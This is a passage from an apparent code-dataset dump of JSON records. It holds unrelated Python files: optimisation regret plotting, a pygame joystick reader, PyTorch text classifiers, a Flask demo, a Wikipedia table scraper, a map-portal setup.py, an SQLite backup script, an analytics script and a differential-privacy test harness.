12:46:14 2017\n\n@author: vinnam\n\"\"\"\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport os\n\n\nfile_path1 = \"./result/brain_hoo_10D_BSLBO_UCB_yscaled.npy\"\nfile_path2 = \"./result/brain_hoo_10D_REMBO_UCB_yscaled.npy\"\n\nBSLBO = np.load(file_path1)\nREMBO = np.load(file_path2)\n\noptimum = -0.397887\n\nBSLBO = optimum - BSLBO\nREMBO = optimum - REMBO\n\nBSLBO_ln = np.log10(BSLBO)\nREMBO_ln = np.log10(REMBO)\n\nx = np.arange(1, 501)\nplt.fill_between(x, np.average(BSLBO_ln, axis = 1) - np.sqrt(np.var(BSLBO_ln, axis = 1)), np.average(BSLBO_ln, axis = 1) + np.sqrt(np.var(BSLBO_ln, axis = 1)), color = 'blue', alpha = 0.5)\nplt.plot(x, np.average(BSLBO_ln, axis = 1), 'b-')\n\nplt.fill_between(x, np.average(REMBO_ln, axis = 1) - np.sqrt(np.var(REMBO_ln, axis = 1)), np.average(REMBO_ln, axis = 1) + np.sqrt(np.var(REMBO_ln, axis = 1)), color = 'yellow', alpha = 0.5)\nplt.plot(x, np.average(REMBO_ln, axis = 1), 'g-')\n\nBSLBO_regret = np.zeros_like(BSLBO)\nREMBO_regret = np.zeros_like(REMBO)\n\nfor i in xrange(BSLBO_regret.shape[0]):\n BSLBO_regret[i, :] = np.min(BSLBO[0:(i+1), :], axis = 0)\n \nfor i in xrange(REMBO_regret.shape[0]):\n REMBO_regret[i, :] = np.min(REMBO[0:(i+1), :], axis = 0)\n \nBSLBO_regret_ln = np.log10(BSLBO_regret)\nREMBO_regret_ln = np.log10(REMBO_regret)\n\nfig = plt.figure()\n\nplt.fill_between(x, np.average(BSLBO_regret_ln, axis = 1) - np.sqrt(np.var(BSLBO_regret_ln, axis = 1)), np.average(BSLBO_regret_ln, axis = 1) + np.sqrt(np.var(BSLBO_regret_ln, axis = 1)), color = 'blue', alpha = 0.5)\nplt.plot(x, np.average(BSLBO_regret_ln, axis = 1), 'b-')\nplt.fill_between(x, np.average(REMBO_regret_ln, axis = 1) - np.sqrt(np.var(REMBO_regret_ln, axis = 1)), np.average(REMBO_regret_ln, axis = 1) + np.sqrt(np.var(REMBO_regret_ln, axis = 1)), color = 'yellow', alpha = 0.5)\nplt.plot(x, np.average(REMBO_regret_ln, axis = 1), color = 'yellow')\n\nfig.savefig('Brainin_10D.png', dpi = 1000)\n\nfig = plt.figure()\n\nfor i in xrange(BSLBO_regret_ln.shape[1]):\n ax1 = plt.subplot(4,5,i+1)\n ax1.plot(BSLBO_regret_ln[:, i])\n ax1.set_ylim([np.min(BSLBO_regret_ln), np.max(BSLBO_regret_ln)])\n \nfig.savefig('BSLBO_regret.png', dpi = 1000)\n\nfig = plt.figure()\n\nfor i in xrange(REMBO_regret_ln.shape[1]):\n ax2 = plt.subplot(4,5,i+1)\n ax2.plot(REMBO_regret_ln[:, i])\n ax2.set_ylim([np.min(REMBO_regret_ln), np.max(REMBO_regret_ln)])\n\nfig.savefig('REMBO_regret.png', dpi = 1000)\n\nplt.figure()\nfor i in xrange(REMBO_regret_ln.shape[1]):\n plt.plot(x, REMBO_regret_ln[:, i], 'y')\n plt.plot(x, BSLBO_regret_ln[:, i], 'b')\n\n","sub_path":"untitled0.py","file_name":"untitled0.py","file_ext":"py","file_size_in_byte":2613,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"438219405","text":"import pygame\npygame.init()\njoysticks = []\nclock = pygame.time.Clock()\nkeepPlaying = True\n\n# for all the connected joysticks\nfor i in range(0, pygame.joystick.get_count()):\n\t# create a Joystick object in our list\n\tjoysticks.append(pygame.joystick.Joystick(i))\n\t# initialize them all (-1 means loop foerever)\n\tjoysticks[-1].init()\n\t# print a statement telling what the name of the controller is\n\tprint(\"Detected joystick \", joysticks[-1].get_name(),\"'\")\n\t\nwhile keepPlaying:\n\tclock.tick(60)\n\tfor event in pygame.event.get():\n\t\t#The zero button is the 'a' button, 1 the 'b' button, 3 the 'y' button, 2 the 'x' button\n\t\tif event.button == 0:\n\t\t\tprint(\"A\")\n\t\tif event.button == 1:\n\t\t\tprint(\"B\")\n\t\tif event.button == 2:\n\t\t\tprint(\"X\")\n\t\tif event.button == 3:\n\t\t\tprint(\"Y\")\t\t\t\t\n","sub_path":"controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":771,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"540938937","text":"\r\n\r\nimport torch\r\nimport torch.nn as nn\r\nimport torch.nn.utils.rnn as rnn\r\n\r\n\r\nclass DenseNetwork(nn.Module):\r\n def __init__(self, embeddings):\r\n super(DenseNetwork, self).__init__()\r\n\r\n \r\n # Create any layers and attributes your network needs.\r\n vocab_size = embeddings.shape[0]\r\n embedding_dim = embeddings.shape[1]\r\n\r\n # create and load embedding layer with pretrained Glove embeddings\r\n self.embedding = nn.Embedding(vocab_size, embedding_dim)\r\n self.embedding.from_pretrained(embeddings)\r\n\r\n # for layer 1\r\n self.fc1 = nn.Linear(100, 36)\r\n\r\n # non lin fcn f\r\n self.relu = nn.ReLU()\r\n\r\n # for making y \\in R^4\r\n self.fc2 = nn.Linear(36, 4)\r\n\r\n \r\n\r\n def forward(self, x):\r\n \r\n #embedding layer\r\n x = self.embedding(x)\r\n \r\n # sum Pooling \r\n # reference: https://discuss.pytorch.org/t/how-to-perform-sum-pooling/3357/2\r\n x = torch.sum(x, dim=1)\r\n \r\n\r\n # linear fcn on pooled\r\n x = self.fc1(x)\r\n\r\n # nonlinear fcn between hidden layer 1 and 2\r\n x = self.relu(x)\r\n # last layer --> output of 4 labels --> softmax --> output\r\n x = self.fc2(x)\r\n \r\n # We DON\"T Do softmax here because cross entropy loss doesn't do that \r\n return x\r\n\r\n\r\n\r\nclass RecurrentNetwork(nn.Module):\r\n def __init__(self, embeddings, num_layers):\r\n super(RecurrentNetwork, self).__init__()\r\n\r\n \r\n vocab_size = embeddings.shape[0]\r\n self.embedding_dim = embeddings.shape[1]\r\n self.num_layers = num_layers\r\n\r\n # create and load embedding layer with pretrained Glove embeddings\r\n self.embedding = nn.Embedding(vocab_size, self.embedding_dim)\r\n self.embedding.from_pretrained(embeddings)\r\n\r\n # Design GRU\r\n self.gru = nn.GRU(self.embedding_dim, self.embedding_dim, self.num_layers, batch_first=True)\r\n\r\n # activation fcn\r\n self.fcn1 = nn.Linear(self.embedding_dim, 4)\r\n\r\n # Gets length of sentence vector (somehow faster than torch.count_nonzero AND performs better! TA said was fine)\r\n @staticmethod\r\n def get_lengths(self, x):\r\n x_lengths = []\r\n for sentence in x:\r\n counter = 0\r\n for word in sentence:\r\n if word != 0:\r\n counter += 1\r\n x_lengths.append(counter)\r\n return x_lengths\r\n \r\n\r\n # x is a PaddedSequence for an RNN\r\n def forward(self, x):\r\n \r\n\r\n\r\n # Get real sentence lengths so padded items won't screw up our GRU\r\n x_lengths = torch.count_nonzero(x, dim=1)\r\n \r\n # Embedding layer\r\n embeds = self.embedding(x)\r\n \r\n # Pack the padded sequence\r\n packed_input = torch.nn.utils.rnn.pack_padded_sequence(embeds,x_lengths, enforce_sorted=False, batch_first=True)\r\n\r\n # Go through 2 layer GRU\r\n # ACCORDING TO TA MUST USE HIDDEN FOR OUTPUT\r\n __, hidden = self.gru(packed_input)\r\n\r\n # Take last hidden layer transform and for output of 4 vals, which will be softmaxed in loss fcn\r\n output = self.fcn1(hidden[-1])\r\n \r\n return output\r\n\r\n\r\n\r\n# references: https://towardsdatascience.com/a-comprehensive-guide-to-convolutional-neural-networks-the-eli5-way-3bd2b1164a53\r\n# and \"Text classification using Convolutional Neural Networks\" on youtube\r\nclass ExperimentalNetwork(nn.Module):\r\n def __init__(self, embeddings):\r\n super(ExperimentalNetwork, self).__init__()\r\n \r\n vocab_size = embeddings.shape[0]\r\n self.embedding_dim = embeddings.shape[1]\r\n \r\n\r\n\r\n # create and load embedding layer with pretrained Glove embeddings\r\n self.embedding = nn.Embedding(vocab_size, self.embedding_dim)\r\n self.embedding.from_pretrained(embeddings)\r\n\r\n\r\n #dropout to prevent overfitting!\r\n self.dropout = nn.Dropout(0.25)\r\n\r\n # Convolutional pooling for 1d layer \r\n # 91 words per sentence vector in input channel, 8 output channels, as windows of 3 words\r\n self.conv1 = nn.Conv1d(91, 8, 4)\r\n # another conv layer\r\n self.conv2 = nn.Conv1d(8, 16, 4)\r\n self.relu = nn.ReLU()\r\n\r\n # max pool the maxes \r\n self.pool = nn.MaxPool1d(3)\r\n\r\n # dense layer 1\r\n self.fc1 = nn.Linear(496, 128)\r\n\r\n # dense layer 2\r\n self.fc2 = nn.Linear(128, 32)\r\n\r\n # convert to labels that are softmaxable\r\n self.fc3 = nn.Linear(32, 4)\r\n \r\n \r\n\r\n # x is a PaddedSequence for an RNN\r\n def forward(self, x):\r\n \r\n # PADDING if sentence x isn't [128,91] (Than you Antonio)\r\n sent_length = x.shape[1]\r\n if sent_length != 91:\r\n pad_length = 91 - sent_length\r\n pad = torch.nn.ConstantPad2d((0,pad_length,0,0),0)\r\n x = pad(x)\r\n\r\n \r\n\r\n #embedding layer\r\n x = self.embedding(x)\r\n \r\n #2 conv layers\r\n x = self.relu(self.conv1(x))\r\n x = self.relu(self.conv2(x))\r\n\r\n # sum Pooling \r\n # reference: https://discuss.pytorch.org/t/how-to-perform-sum-pooling/3357/2\r\n x = self.pool(x)\r\n \r\n # flatten\r\n x = x.view(-1, self.num_flat_features(x))\r\n\r\n # dense layer with relu activation\r\n x = self.fc1(x)\r\n x = self.relu(x)\r\n\r\n # Dropout to avoid overfit\r\n x= self.dropout(x)\r\n\r\n # dense layer with relu activation\r\n x = self.fc2(x)\r\n x = self.relu(x)\r\n\r\n # Dropout to avoid overfit\r\n x= self.dropout(x)\r\n\r\n # last layer --> output of 4 labels --> output --> softmax in loss\r\n x = self.fc3(x)\r\n \r\n return x\r\n\r\n # helper function for flattening\r\n # src: https://pytorch.org/tutorials/beginner/blitz/neural_networks_tutorial.html\r\n def num_flat_features(self, x):\r\n size = x.size()[1:] # all dimensions except the batch dimension\r\n num_features = 1\r\n for s in size:\r\n num_features *= s\r\n return num_features\r\n","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":6126,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"105483152","text":"from flask import Flask\nfrom flask import render_template\nfrom flask import request\napp = Flask(__name__)\n\n@app.route('/')\ndef index(): \n #변수 정의\n userName = '홍길동'\n userAge = 27\n myList=['사과','포도','망고']\n myTuple=(100,200,300,400)\n myDict={'a':'apart','b':'banana','c':'cat'}\n return render_template('index_var.html',userName=userName,\\\n userAge=userAge,myList=myList,myTuple=myTuple,\\\n myDict=myDict)\n\n\n\n\n\n\n\n\n\n\n\n# @app.route('/test1')\n# def test1():\n# return '

    test1


    start Page'\n\n# @app.route('/test1/sub1')\n# @app.route('/test1/sub2')\n# def test1_sub():\n# return '

    test1 sub1 또는 test1 sub2


    start Page'\n\n# #쿼리 스트링 방식으로 데이타 전달후 출력\n# @app.route('/test2/')\n# def test2(data1):\n# return 'data1 = %s' % data1\n\n# @app.route('/test2//')\n# def test2_data1_data2(data1,data2):\n# return 'data1 = %s,data2=%s
    start Page' % (data1,data2)\n\n# #쿼리 스트링방식으로 데이터 전달 및 출력\n# #/라우터주소/<데이터값>\n# #라우터주소/<자료형:데이터값>\n# @app.route('/user/')\n# def show_user_profile(username):\n# return 'User %s' % username\n\n# @app.route('/user//')\n# def show_user_profile_age(username, age):\n# return 'Username %s, 나이 %d' % (username, age)\n# #http://127.0.0.1/user/홍길동/23/암행어사\n# @app.route('/user///')\n# def show_user_profile_age_job(username, age,job):\n# return 'Username %s, 나이 %d, 직업 %s' % (username, age,job)\n\napp.run(host='127.0.0.2', port=5000, debug=True)\n\n\n","sub_path":"app1.py","file_name":"app1.py","file_ext":"py","file_size_in_byte":1703,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"498207713","text":"from bs4 import BeautifulSoup\nimport pandas as pd\nimport requests\n\n# Read the wiki page which gets updated for us continously\npage = requests.get('https://en.wikipedia.org/wiki/The_Voice_(U.S._TV_series)')\n\n# Parse the page as a BS obejct\nsoup = BeautifulSoup(page.content, 'lxml')\n\n# Grab all the tables\ntable = soup.find_all('table')\n\n# Turn all the tables into dataframes\ndfs = pd.read_html(str(table))\n\n# Extract all the contestant dataframes\ndf = dfs[5:18]\n\n# Clean up every dataframe\nfor i, frame in enumerate(df):\n frame.columns = frame.iloc[0]\n frame.drop(frame.index[0], inplace=True)\n\n# Lists for all useful parameters\ncontestants = []\nteams = []\nseasons = []\n\n# Grab info from dataframes\nfor i, frame in enumerate(df):\n contestants.append(frame.values)\n for k in range(frame.values.size):\n seasons.append(i+1)\n\n# Clean contestants list\ncontestants = [name for sublist in contestants for name in sublist]\ncontestants = [name for sublist in contestants for name in sublist]\n\n# Clean teams list\nfor frame in df:\n for person in contestants:\n for k in range(len(frame.index)):\n x = frame.columns[(frame == person).iloc[k]]\n x = x.format()\n if len(x) is not 0:\n teams.append(x)\n\nteams = [peep for sublist in teams for peep in sublist]\n\n# Create final dataframe\ndf = {'Contestant': contestants,\n 'Season': seasons,\n 'Team': teams}\n\ndf = pd.DataFrame(df)\nprint(df)\n\n# Write to csv\ndf.to_csv('ContestantData.csv')","sub_path":"ContestantData.py","file_name":"ContestantData.py","file_ext":"py","file_size_in_byte":1502,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"558698633","text":"#/usr/bin/env python\n#\n# (c) 2012 Commonwealth of Australia\n# Australian Bureau of Meteorology, COSPPac COMP\n# All Rights Reserved\n#\n# Authors: Danielle Madeley \n\nNAME = 'map-portal'\nDESCRIPTION = 'Map Portal'\nLONG_DESCRIPTION = \"\"\"\\\nCOMP Group Climate Portal\n\"\"\"\nAUTHOR = 'COMP'\nAUTHOR_EMAIL = 'COSPPac_COMP_Unit@bom.gov.au'\nURL = 'http://tuscany.bom.gov.au/wiki/index.php/Map_Portal'\n\nrpm_deps = [\n 'basemap >= 1.1.7',\n 'mapserver-python >= 6.0.1',\n 'matplotlib >= 1.1.0',\n 'netCDF4 >= 0.9.7',\n 'numpy >= 1.6.1',\n 'scipy >= 0.9.0',\n]\n\nsrc = [\n 'map.py',\n 'portal.py',\n 'regions.py',\n 'logs.py',\n]\n\npackages = [\n 'ocean',\n # core\n 'ocean.config',\n 'ocean.netcdf',\n 'ocean.util',\n 'ocean.plotter',\n 'ocean.processing',\n # dataset\n 'ocean.datasets',\n 'ocean.datasets.bran',\n 'ocean.datasets.ersst',\n 'ocean.datasets.sealevel',\n 'ocean.datasets.reynolds',\n 'ocean.datasets.ww3',\n 'ocean.datasets.ww3forecast',\n 'ocean.datasets.coral',\n 'ocean.datasets.chlorophyll',\n 'ocean.datasets.poamasla',\n 'ocean.datasets.poamassta',\n 'ocean.datasets.currentforecast',\n 'ocean.datasets.convergence',\n 'ocean.datasets.msla',\n 'ocean.datasets.mur',\n 'ocean.datasets.tideforecast'\n]\n\nscripts = [\n 'replicate-portal-data',\n 'cleanup-raster-cache',\n 'update-data'\n]\n\n# run generate-manifest.py after editing these sections\nbackend_resources = [\n 'maps/bathymetry.map',\n 'maps/mean.map',\n 'maps/mean_sub.map',\n 'maps/anom.map',\n 'maps/dec.map',\n 'maps/trend.map',\n 'maps/hs.map',\n 'maps/chlo.map',\n 'maps/coral_daily.map',\n 'maps/coral_outlook.map',\n 'maps/wav.map',\n 'maps/wnd.map',\n 'maps/grey.map',\n 'maps/poamasla.map',\n 'maps/current.map',\n 'maps/mur.map',\n 'maps/contour.map',\n 'maps/normal.map',\n 'maps/salt.map',\n 'maps/uv.map',\n 'maps/front.map',\n 'maps/height.map',\n 'fonts/fonts.list',\n 'fonts/DejaVuSans.ttf',\n]\n\nmap_layer_extensions = ['dbf', 'prj', 'shp', 'shx' ]\nmap_layers = [\n 'bathymetry_0',\n 'bathymetry_200',\n 'bathymetry_1000',\n 'bathymetry_2000',\n 'bathymetry_3000',\n 'bathymetry_4000',\n 'bathymetry_5000',\n 'bathymetry_6000',\n 'bathymetry_7000',\n 'bathymetry_8000',\n 'bathymetry_9000',\n 'bathymetry_10000',\n 'ocean',\n 'pacific_islands_capitals',\n 'southern_pac',\n 'northern_pac',\n 'land',\n 'COSPPac_EEZs',\n 'ReefLocations',\n 'CRW_Outlines',\n 'MP_FINAL',\n 'CRW_Outlook_EEZ'\n]\n\nBASE_PATH = 'share/portal'\nhtml = [\n 'ocean.html',\n 'app.html'\n]\n\nscript_substitutions = {\n # development version, compressed version\n 'jquery.js': ('jquery-1.11.3.js', 'jquery-1.11.3.min.js'),\n 'jquery-ui.js': ('jquery-ui-1.9.2.custom/js/jquery-ui-1.9.2.custom.js',\n 'jquery-ui-1.9.2.custom/js/jquery-ui-1.9.2.custom.min.js'),\n 'jquery-ui.css': ('jquery-ui-1.9.2.custom/css/smoothness/jquery-ui-1.9.2.custom.css',\n 'jquery-ui-1.9.2.custom/css/smoothness/jquery-ui-1.9.2.custom.min.css'),\n 'OpenLayers.js': ('OpenLayers.js', 'OpenLayers.min.js'),\n}\n\nweb_files = [\n 'css/comp/controlPanel.css',\n 'css/comp/compmap.css',\n 'css/comp/controlvars.css',\n 'css/comp/jumbotron.css',\n 'css/comp/dragdealer.css',\n 'js/comp/controlPanel.js',\n 'js/comp/compmap.js',\n 'js/comp/dsConf.js',\n 'js/comp/app.js',\n 'js/comp/dragdealer.js',\n 'js/comp/Ocean.js',\n 'js/comp/data_points_to_load.js',\n 'js/comp/tide_gauges_to_load.js'\n]\n\ndata = [\n 'config/comp/datasets.json',\n 'config/comp/vargroups.json',\n 'config/comp/portals.json',\n 'config/comp/app.json',\n 'config/comp/tidegauges.geojson',\n 'images/search.gif',\n 'images/calendar-blue.gif',\n 'images/blank.png',\n 'images/loading.gif',\n 'images/notavail.png',\n 'images/climate.jpg',\n 'images/bom_logo.gif',\n 'images/bathymetry_ver.png',\n 'images/email.png',\n 'images/climate.png',\n 'images/coral.png',\n 'images/fishing.png',\n 'images/sealevel.png',\n 'images/shipping.png',\n 'images/surfer.png',\n 'images/daily_0.png',\n 'images/daily_1.png',\n 'images/daily_2.png',\n 'images/daily_3.png',\n 'images/daily_4.png',\n 'images/outlook_0.png',\n 'images/outlook_1.png',\n 'images/outlook_2.png',\n 'images/outlook_3.png',\n 'images/outlook_4.png',\n 'help/about_BRAN.pdf',\n 'help/about_sealevel.pdf',\n 'help/about_ww3forecasts.pdf',\n 'help/about_ww3climate.pdf',\n 'help/about_chlorophyll.pdf',\n 'help/about_coralbleaching.pdf',\n 'help/about_currents.pdf',\n 'help/about_OceanTemperature.pdf',\n 'help/about_POAMA_Sea_Level.pdf',\n 'help/about_POAMA_SST.pdf',\n 'help/Beverly_11_Remote_sensing_guide.pdf',\n 'help/about_AVISO_Sea_Level.pdf',\n 'help/about_MUR_Fronts.pdf'\n]\n\n# CODE BEGINS\nimport os.path\n\nbackend_resources += [ os.path.join('maps', 'layers', '%s.%s' % (l, ext))\n for l in map_layers\n for ext in map_layer_extensions ]\n\nif __name__ == '__main__':\n from distutils.core import setup\n from distutils.command.bdist_rpm import bdist_rpm\n\n from localdistutils.dist import PortalDist\n from localdistutils.build import build\n from localdistutils.build_py import build_py\n from localdistutils.build_web import build_web\n from localdistutils.install import install\n from localdistutils.install_web import install_web\n from localdistutils import util\n\n import itertools\n\n # add Requires: for RPM\n _original_make_spec_file = bdist_rpm._make_spec_file\n def _make_spec_file(*args):\n spec = _original_make_spec_file(*args)\n spec.insert(spec.index('%description') - 1,\n 'Requires: %s' % ', '.join(rpm_deps))\n return spec\n bdist_rpm._make_spec_file = _make_spec_file\n\n data_files = \\\n [ ('/var/www/cgi-bin/portal', [ os.path.join('src', s) for s in src ]) ] + \\\n [ (os.path.join(BASE_PATH, d), list(f))\n for d, f in itertools.groupby(data, lambda e: os.path.dirname(e)) ]\n\n setup(name=NAME,\n version=util.get_version(),\n author=AUTHOR,\n author_email=AUTHOR_EMAIL,\n url=URL,\n description=DESCRIPTION,\n long_description=LONG_DESCRIPTION,\n\n packages=packages,\n package_data={\n 'ocean': [ os.path.join('resource', r)\n for r in backend_resources ],\n },\n scripts=[ os.path.join('src', s) for s in scripts ],\n data_files = data_files,\n\n # FIXME: BASE_PATH here is ignored because I'm lazy, BASE_PATH from\n # web_files is used\n html_files = (BASE_PATH,\n [ os.path.join('html', h) for h in html ],\n script_substitutions),\n web_files = (BASE_PATH, web_files),\n\n # extend distutils\n distclass=PortalDist,\n cmdclass={\n 'build': build,\n 'build_py': build_py,\n 'build_web': build_web,\n 'install': install,\n 'install_web': install_web,\n },\n )\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":7275,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"356848789","text":"import sqlite3\nimport apsw\nimport time\ncurrent_time = int(time.time())\n_connection = apsw.Connection('app.db')\nconnection = sqlite3.connect(_connection)\n# Use connection as DB-API 2.0, then \"Save-As\" like this:\ndestdb = apsw.Connection('/usr/lib/cytora/backups/backup-' + str(current_time) + \".db\")\nwith destdb.backup(\"main\", _connection, \"main\") as backup:\n while not backup.done:\n \tbackup.step(100)\n\n","sub_path":"backup-sqlite.py","file_name":"backup-sqlite.py","file_ext":"py","file_size_in_byte":408,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"596913395","text":"#/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport sys\nsys.path.append('/home/takagi/git/analytics/analytics_tool')\nimport utility.db_utility as db_util\nfrom datetime import datetime as dt\nimport commands\nimport utility.device_master as dev_master\nimport utility.easy_access as ea\nimport utility.date_func as df\n\nargvs = sys.argv\nlower = 20130625\n#DB\n\n#課金した日の取得\ndata = ea.first_subscription(\"kidsnbooks\", 20130625, 20130930)\n\n#本データ\nfor i in range(110):\n date = df.ndaysago(lower, -i)\n b = ea.kidsnbooks_booklog(date)\n for uid, d in data.items():\n data[uid].setdefault(\"book_id\", None)\n data[uid].setdefault(\"book_name\", None)\n data[uid].setdefault(\"date\", None)\n if b.has_key(uid):\n if d[\"date\"] == None or (d[\"date\"] > b[uid][\"start\"] and b[uid][\"start\"] >= d[\"subdate\"]):\n data[uid][\"date\"] = b[uid][\"start\"]\n data[uid][\"book_id\"] = b[uid][\"book_id\"]\n data[uid][\"book_name\"] = b[uid][\"book_name\"]\n \n\n\n#summary\nsummary = {}\nfor uid, d in data.items():\n summary.setdefault(d[\"book_id\"], {})\n summary[d[\"book_id\"]].setdefault(\"name\", d[\"book_name\"])\n summary[d[\"book_id\"]].setdefault(\"uu\", 0)\n if d[\"subdate\"] != None:\n summary[d[\"book_id\"]][\"uu\"] += 1\n\n\n#output\nout = open(\"/home/takagi/git/analytics/spot/data_temp/subscription_initial_book\", 'w')\n\nfor book_id, app in summary.items():\n if summary[book_id][\"uu\"] > 0:\n record = str(book_id) + \"\\t\"\n record += str(summary[book_id][\"name\"]) + \"\\t\"\n record += str(summary[book_id][\"uu\"]) + \"\\n\"\n out.write(record)\n\nout.close()\n\n\n","sub_path":"work/analytics/spot/kidsnbooks/subscription_initial_book_20130924.py","file_name":"subscription_initial_book_20130924.py","file_ext":"py","file_size_in_byte":1661,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"633424748","text":"# This file contains a list of tests that can be passed actual aggregates or result aggregates from a DP implementation\n# It tries to use a sample dataset S and splits it randomly into two neighboring datasets D1 and D2\n# Using these neighboring datasets, it applies the aggregate query repeatedly\n# It tests the DP condition to let the DP implementer know whether repeated aggregate query results are not enough to re-identify D1 or D2 which differ by single individual\n# i.e. passing (epsilon, delta) - DP condition\n# If the definition is not passed, there is a bug or it is a by-design bug in case of passing actual aggregates\n\nimport pandas as pd\nimport numpy as np\nimport math\nimport matplotlib.pyplot as plt\nimport Aggregation as agg\nimport os\nfrom scipy import stats\n\nclass DPVerification:\n # Set the epsilon parameter of differential privacy\n def __init__(self, epsilon=1.0, dataset_size=10000):\n self.epsilon = epsilon\n self.dataset_size = dataset_size\n self.file_dir = os.path.dirname(os.path.abspath(__file__))\n self.csv_path = r'../service/datasets'\n self.df, self.dataset_path, self.file_name = self.create_simulated_dataset()\n print(\"Loaded \" + str(len(self.df)) + \" records\")\n self.N = len(self.df)\n self.delta = 1/(self.N * math.sqrt(self.N))\n\n def create_simulated_dataset(self, file_name = \"simulation\"):\n np.random.seed(1)\n userids = list(range(1, self.dataset_size+1))\n userids = [\"A\" + str(user) for user in userids]\n usage = np.random.geometric(p=0.5, size=self.dataset_size).tolist()\n df = pd.DataFrame(list(zip(userids, usage)), columns=['UserId', 'Usage'])\n \n # Storing the data as a CSV\n file_path = os.path.join(self.file_dir, self.csv_path, file_name + \".csv\")\n df.to_csv(file_path, sep=',', encoding='utf-8', index=False)\n return df, file_path, file_name\n\n # Generate dataframes that differ by a single record that is randomly chosen\n def generate_neighbors(self, load_csv = False):\n if(load_csv):\n self.df = pd.read_csv(self.dataset_path)\n \n if(self.N == 0):\n print(\"No records in dataframe to run the test\")\n return None, None\n \n d1 = self.df\n drop_idx = np.random.choice(self.df.index, 1, replace=False)\n d2 = self.df.drop(drop_idx)\n print(\"Length of D1: \", len(d1), \" Length of D2: \", len(d2))\n\n d1_yaml_path, d2_yaml_path = \"\", \"\"\n if(load_csv):\n # Storing the data as a CSV for applying queries via Burdock querying system\n d1_file_path = os.path.join(self.file_dir, self.csv_path , \"d1.csv\")\n d2_file_path = os.path.join(self.file_dir, self.csv_path , \"d2.csv\")\n d1_yaml_path = os.path.join(self.file_dir, self.csv_path , \"d1.yaml\")\n d2_yaml_path = os.path.join(self.file_dir, self.csv_path , \"d2.yaml\")\n d1.to_csv(d1_file_path, sep=',', encoding='utf-8', index=False)\n d2.to_csv(d2_file_path, sep=',', encoding='utf-8', index=False)\n\n return d1, d2, d1_yaml_path, d2_yaml_path\n \n # If there is an aggregation function that we need to test, we need to apply it on neighboring datasets\n # This function applies the aggregation repeatedly to log results in two vectors that are then used for generating histogram\n # The histogram is then passed through the DP test\n def apply_aggregation_neighbors(self, f, args1, args2):\n fD1 = f(*args1)\n fD2 = f(*args2)\n\n print(\"Mean fD1: \", np.mean(fD1), \" Stdev fD1: \", np.std(fD1), \" Mean fD2: \", np.mean(fD2), \" Stdev fD2: \", np.std(fD2))\n return fD1, fD2\n\n # Instead of applying function to dataframe, this'll pass a query through PrivSQL and get response\n # This way we can test actual SQLDP implementation\n def apply_query_neighbors(self, d1, d2, agg_query):\n # To do\n return None\n\n # Generate histograms given the vectors of repeated aggregation results applied on neighboring datasets\n def generate_histogram_neighbors(self, fD1, fD2, numbins=0, binsize=\"auto\", exact=False):\n d1 = fD1\n d2 = fD2\n d = np.concatenate((d1, d2), axis=None)\n n = d.size\n binlist = []\n minval = min(min(d1), min(d2))\n maxval = max(max(d1), max(d2))\n if(exact):\n binlist = np.linspace(minval, maxval, 2)\n elif(numbins > 0):\n binlist = np.linspace(minval, maxval, numbins)\n elif(binsize == \"auto\"):\n iqr = np.subtract(*np.percentile(d, [75, 25]))\n numerator = 2 * iqr if iqr > 0 else maxval - minval\n denominator = n ** (1. / 3)\n binwidth = numerator / denominator # Freedman–Diaconis' choice\n numbins = int(math.ceil((maxval - minval) / binwidth))\n binlist = np.linspace(minval, maxval, numbins)\n else:\n # Choose bin size of unity\n binlist = np.arange(np.floor(minval),np.ceil(maxval))\n \n # Calculating histograms of fD1 and fD2\n d1hist, bin_edges = np.histogram(d1, bins = binlist, density = False)\n print(\"Sum of frequencies in D1 Histogram: \", np.sum(d1hist))\n d2hist, bin_edges = np.histogram(d2, bins = binlist, density = False)\n print(\"Sum of frequencies in D2 Histogram: \", np.sum(d2hist))\n\n return d1hist, d2hist, bin_edges\n \n # Plot histograms given the vectors of repeated aggregation results applied on neighboring datasets\n def plot_histogram_neighbors(self, fD1, fD2, d1histupperbound, d2histupperbound, d1hist, d2hist, d1lower, d2lower, binlist, bound=True, exact=False):\n plt.figure(figsize=(15,6))\n if(exact):\n ax = plt.subplot(1, 1, 1)\n ax.ticklabel_format(useOffset=False)\n plt.xlabel('Bin')\n plt.ylabel('Probability')\n plt.hist(fD1, width=0.2, alpha=0.5, ec=\"k\", align = \"right\", bins = 1)\n plt.hist(fD2, width=0.2, alpha=0.5, ec=\"k\", align = \"right\", bins = 1)\n ax.legend(['D1', 'D2'], loc=\"upper right\")\n return\n \n ax = plt.subplot(1, 2, 1)\n ax.ticklabel_format(useOffset=False)\n plt.xlabel('Bin')\n plt.ylabel('Frequency')\n if(bound):\n plt.bar(binlist[:-1], d2histupperbound, alpha=0.5, width=np.diff(binlist), ec=\"k\", align=\"edge\")\n plt.bar(binlist[:-1], d1lower, alpha=0.5, width=np.diff(binlist), ec=\"k\", align=\"edge\")\n plt.legend(['D1', 'D2'], loc=\"upper right\")\n else:\n plt.bar(binlist[:-1], d1hist, alpha=0.5, width=np.diff(binlist), ec=\"k\", align=\"edge\")\n plt.bar(binlist[:-1], d2hist, alpha=0.5, width=np.diff(binlist), ec=\"k\", align=\"edge\")\n plt.legend(['D1', 'D2'], loc=\"upper right\")\n\n ax = plt.subplot(1, 2, 2)\n ax.ticklabel_format(useOffset=False)\n plt.xlabel('Bin')\n plt.ylabel('Frequency')\n if(bound):\n plt.bar(binlist[:-1], d1histupperbound, alpha=0.5, width=np.diff(binlist), ec=\"k\", 